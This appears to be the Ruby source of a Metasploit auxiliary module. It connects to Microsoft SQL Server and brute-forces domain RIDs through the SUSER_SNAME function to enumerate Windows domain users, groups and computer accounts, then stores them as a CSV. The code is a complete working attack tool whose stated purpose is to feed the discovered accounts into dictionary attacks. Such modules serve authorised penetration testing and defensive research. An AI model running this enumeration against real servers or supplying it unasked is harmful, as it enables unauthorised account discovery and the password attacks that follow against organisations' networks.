## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration', 'Description' => %q{ This module can be used to bruteforce RIDs associated with the domain of the SQL Server using the SUSER_SNAME function. This is similar to the smb_lookupsid module, but executed through SQL Server queries as any user with the PUBLIC role (everyone). Information that can be enumerated includes Windows domain users, groups, and computer accounts. Enumerated accounts can then be used in online dictionary attacks. }, 'Author' => [ 'nullbind ', 'antti ' ], 'License' => MSF_LICENSE, 'References' => [[ 'URL','https://docs.microsoft.com/en-us/sql/t-sql/functions/suser-sname-transact-sql']] )) register_options( [ OptInt.new('FuzzNum', [true, 'Number of principal_ids to fuzz.', 10000]), ]) end def run # Check connection and issue initial query print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...") if mssql_login_datastore print_good('Connected.') else print_error('Login was unsuccessful. Check your credentials.') disconnect return end # Get the server name sql_server_name = get_sql_server_name print_status("SQL Server Name: #{sql_server_name}") # Get the domain name sql_server_domain = get_windows_domain if sql_server_domain.nil? print_error("Could not recover the SQL Server's domain.") disconnect return else print_status("Domain Name: #{sql_server_domain}") end # Check if the domain and hostname are the same if sql_server_name == sql_server_domain print_error("The SQL Server does not appear to be part of a Windows domain.") disconnect return end # Get the base sid for the domain windows_domain_sid = get_windows_domain_sid(sql_server_domain) if windows_domain_sid.nil? print_error("Could not recover the SQL Server's domain sid.") disconnect return else print_good("Found the domain sid: #{windows_domain_sid}") end # Get a list of windows users, groups, and computer accounts using SUSER_NAME() print_status("Brute forcing #{datastore['FuzzNum']} RIDs through the SQL Server, be patient...") win_domain_user_list = get_win_domain_users(windows_domain_sid) disconnect if win_domain_user_list.nil? || win_domain_user_list.empty? print_error('Sorry, no Windows domain accounts were found, or DC could not be contacted.') return end # Print number of objects found and write to a file print_good("#{win_domain_user_list.length} user accounts, groups, and computer accounts were found.") win_domain_user_list.sort.each do |windows_login| vprint_status(" - #{windows_login}") end # Create table for report windows_domain_login_table = Rex::Text::Table.new( 'Header' => 'Windows Domain Accounts', 'Ident' => 1, 'Columns' => ['name'] ) # Add brute forced names to table win_domain_user_list.each do |object_name| windows_domain_login_table << [object_name] end # Create output file this_service = report_service( :host => mssql_client.peerhost, :port => mssql_client.peerport, :name => 'mssql', :proto => 'tcp' ) file_name = "#{mssql_client.peerhost}-#{mssql_client.peerport}_windows_domain_accounts.csv" path = store_loot( 'mssql.domain.accounts', 'text/plain', mssql_client.peerhost, windows_domain_login_table.to_csv, file_name, 'Domain Users enumerated through SQL Server', this_service) print_status("Query results have been saved to: #{path}") end # Get list of windows accounts,groups,and computer accounts def get_win_domain_users(windows_domain_sid) # Create array to store the windws accounts etc windows_logins = [] # Fuzz the principal_id parameter passed to the SUSER_NAME function (500..datastore['FuzzNum']).each do |principal_id| # Convert number to hex and fix order principal_id_hex = "%02X" % principal_id principal_id_hex_pad = (principal_id_hex.size.even? ? principal_id_hex : ("0"+ principal_id_hex)) principal_id_clean = principal_id_hex_pad.scan(/(..)/).reverse.flatten.join # Add padding principal_id_hex_padded2 = principal_id_clean.ljust(8, '0') # Create full sid win_sid = "0x#{windows_domain_sid}#{principal_id_hex_padded2}" # Return if sid does not resolve correctly for a domain if win_sid.length < 48 return nil end # Setup query sql = "SELECT SUSER_SNAME(#{win_sid}) as name" # Execute query result = mssql_query(sql) # Parse results parse_results = result[:rows] windows_login = parse_results[0][0] # Print account,group,or computer account etc if windows_login.length != 0 print_status(" - #{windows_login}") vprint_status("Test sid: #{win_sid}") end # Add to windows domain object list windows_logins.push(windows_login) unless windows_logins.include?(windows_login) end # Return list of logins windows_logins end # Get windows domain def get_windows_domain # Setup query to check the domain sql = "SELECT DEFAULT_DOMAIN() as mydomain" # Run query result = mssql_query(sql) # Parse query results parse_results = result[:rows] sql_server_domain = parse_results[0][0] # Return domain sql_server_domain end # Get the sql server's hostname def get_sql_server_name # Setup query to check the server name sql = "SELECT @@servername" # Run query result = mssql_query(sql) # Parse query results parse_results = result[:rows] sql_instance_name = parse_results[0][0] sql_server_name = sql_instance_name.split('\\')[0] # Return servername sql_server_name end # Get windows domain def get_windows_domain_sid(sql_server_domain) # Set group domain_group = "#{sql_server_domain}\\Domain Admins" # Setup query to check the Domain SID sql = "select SUSER_SID('#{domain_group}') as dasid" # Run query result = mssql_query(sql) # Parse query results parse_results = result[:rows] object_sid = parse_results[0][0] domain_sid = object_sid[0..47] # Return if sid does not resolve for a domain if domain_sid.length == 0 return nil end # Return domain sid domain_sid end end